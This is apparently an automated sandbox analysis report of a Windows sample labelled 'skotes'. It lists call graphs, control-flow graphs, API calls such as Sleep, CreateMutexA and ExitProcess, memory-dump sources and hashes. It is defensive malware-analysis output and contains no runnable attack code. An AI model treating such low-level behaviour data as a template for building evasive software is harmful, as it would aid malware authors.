10356 93970 10357 ac68b __Mtx_init_in_situ 2 API calls 10356->10357 10358 939a7 10357->10358 10359 ac68b __Mtx_init_in_situ 2 API calls 10358->10359 10360 939e6 10359->10360 10361 92170 10362 ac6fc InitializeCriticalSectionEx 10361->10362 10363 9217a 10362->10363 10441 955f0 10442 95610 10441->10442 10443 922c0 3 API calls 10442->10443 10444 95710 __floor_pentium4 10442->10444 10443->10442 10445 943f0 10446 abedf InitOnceExecuteOnce 10445->10446 10447 9440a 10446->10447 10448 94411 10447->10448 10449 c6cbb 3 API calls 10447->10449 10450 94424 10449->10450 10255 a9ef0 10256 a9f0c 10255->10256 10257 ac68b __Mtx_init_in_situ 2 API calls 10256->10257 10258 a9f17 10257->10258 10076 94276 10079 92410 10076->10079 10078 9427f 10080 92424 10079->10080 10083 ab52d 10080->10083 10091 c3aed 10083->10091 10085 9242a 10085->10078 10086 ab5a5 ___std_exception_copy 10098 ab1ad 10086->10098 10087 ab598 10094 aaf56 10087->10094 10102 c4f29 10091->10102 10095 aaf9f ___std_exception_copy 10094->10095 10096 aafb2 shared_ptr 10095->10096 10109 ab39f 10095->10109 10096->10085 10099 ab1d8 10098->10099 10101 ab1e1 shared_ptr 10098->10101 10100 ab39f 4 API calls 10099->10100 10100->10101 10101->10085 10104 c4f2e __cftof 10102->10104 10103 ab555 10103->10085 10103->10086 10103->10087 10104->10103 10105 cd634 __cftof 3 API calls 10104->10105 10108 c8bfc ___std_exception_copy 10104->10108 10105->10108 10106 c65ed __cftof 3 API calls 10107 c8c2f 10106->10107 10108->10106 10110 abedf InitOnceExecuteOnce 10109->10110 10111 ab3e1 10110->10111 10112 ab3e8 10111->10112 10120 c6cbb 10111->10120 10112->10096 10121 c6cc7 __dosmaperr 10120->10121 10122 ca671 __cftof 3 API calls 10121->10122 10123 c6ccc 10122->10123 10124 c8bec __cftof 3 API calls 10123->10124 10125 c6cf6 10124->10125

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 000C652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 342 c652b-c6538 call ca302 345 c655a-c656c call c656d ExitProcess 342->345 346 c653a-c6548 GetPEB 342->346 346->345 347 c654a-c6559 346->347 347->345
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,000C652A,?,?,?,?,?,000C7661), ref: 000C6567
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                  • Opcode ID: 7750279db8a24c376d9452910a4e5d4bca616e88111aaa84fd98720a42f7d3c9
                                                                                                                                                                                                                                                  • Instruction ID: efd91735b054c0e4eb4be7f15795a3dd19a9743fc96610a037b5dfe5f736ca3d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7750279db8a24c376d9452910a4e5d4bca616e88111aaa84fd98720a42f7d3c9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28E0863014154CAEDF357F18C819E8D3B99EB52745F104C08F85586322CB66EE41C791
                                                                                                                                                                                                                                                  Function 00099BA5 Relevance: 3.1, APIs: 2, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 0 99ba5-99d91 call a7a00 call 95c10 call 98b30 call a8220
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 92e956784b45d2982e693a746b61c9aad0a612110f0d87b699d5f374fc8ea418
                                                                                                                                                                                                                                                  • Instruction ID: bf434e9686b7fa732f59b6d2779bd71553d8d03bd25b87fa0b734834f65481b1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92e956784b45d2982e693a746b61c9aad0a612110f0d87b699d5f374fc8ea418
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3312671B042008BEF18AB7CDDC9BADB7A2EB83310F24861DE014D77D6C77999849792
                                                                                                                                                                                                                                                  Function 00099F44 Relevance: 3.1, APIs: 2, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 22 99f44-99f64 26 99f92-99fae 22->26 27 99f66-99f72 22->27 28 99fdc-99ffb 26->28 29 99fb0-99fbc 26->29 30 99f88-99f8f call ad663 27->30 31 99f74-99f82 27->31 36 9a029-9a916 call a80c0 28->36 37 99ffd-9a009 28->37 34 99fbe-99fcc 29->34 35 99fd2-99fd9 call ad663 29->35 30->26 31->30 32 9a92b 31->32 39 9a953-9a994 Sleep CreateMutexA 32->39 40 9a92b call c6c6a 32->40 34->32 34->35 35->28 43 9a00b-9a019 37->43 44 9a01f-9a026 call ad663 37->44 52 9a9a7-9a9a8 39->52 53 9a996-9a998 39->53 40->39 43->32 43->44 44->36 53->52 54 9a99a-9a9a5 53->54 54->52
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: f5d0e899787a194550f05460ea8cd6c3bdede45b35553bd0c072f33e4645402a
                                                                                                                                                                                                                                                  • Instruction ID: da401ead84729c1ebdd1bd5e88d927f033a944ad4742f53b39e59f7515a598db
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5d0e899787a194550f05460ea8cd6c3bdede45b35553bd0c072f33e4645402a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB312631B042009BFF18AB6CDC99BADB7A2EB87310F24861DE415EB6D1C77699809752
                                                                                                                                                                                                                                                  Function 0009A079 Relevance: 3.1, APIs: 2, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 56 9a079-9a099 60 9a09b-9a0a7 56->60 61 9a0c7-9a0e3 56->61 62 9a0a9-9a0b7 60->62 63 9a0bd-9a0c4 call ad663 60->63 64 9a111-9a130 61->64 65 9a0e5-9a0f1 61->65 62->63 70 9a930 62->70 63->61 68 9a15e-9a916 call a80c0 64->68 69 9a132-9a13e 64->69 66 9a0f3-9a101 65->66 67 9a107-9a10e call ad663 65->67 66->67 66->70 67->64 73 9a140-9a14e 69->73 74 9a154-9a15b call ad663 69->74 77 9a953-9a994 Sleep CreateMutexA 70->77 78 9a930 call c6c6a 70->78 73->70 73->74 74->68 86 9a9a7-9a9a8 77->86 87 9a996-9a998 77->87 78->77 87->86 88 9a99a-9a9a5 87->88 88->86
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
